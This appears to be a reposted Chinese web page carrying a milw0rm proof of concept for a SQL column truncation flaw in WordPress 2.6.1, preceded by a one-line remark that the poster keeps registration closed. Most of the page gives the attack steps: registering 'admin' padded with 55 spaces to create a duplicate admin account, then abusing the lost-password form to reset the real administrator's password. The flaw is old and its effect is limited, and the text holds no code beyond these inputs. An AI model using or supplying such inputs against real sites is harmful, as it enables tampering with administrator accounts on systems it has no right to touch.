WordPress 2.6.1 SQL Column Truncation Vulnerability剖析dongfang - 超凡娱乐

WordPress 2.6.1 SQL Column Truncation Vulnerability剖析dongfang

2019-02-12 10:02:01 | 作者: 凌青 | 标签: 测验,开端,用户注册 | 浏览: 3486

用wordpress的要注意了,不过拿我这儿测验就没作用了,我从一开端就是封闭用户注册的。 # WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: https://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# https://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends 1. go to url: server.com/wp-login.php?action=register 2. register as: login: admin x
email: your email^ admin[55 space chars]x now, we have duplicated admin account in database 3. go to url: server.com/wp-login.php?action=lostpassword 4. write your email into field and submit this form 5. check your email and go to reset confirmation link 6. admins password changed, but new password will be send to correct admin email ;/ # milw0rm.com
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表超凡娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章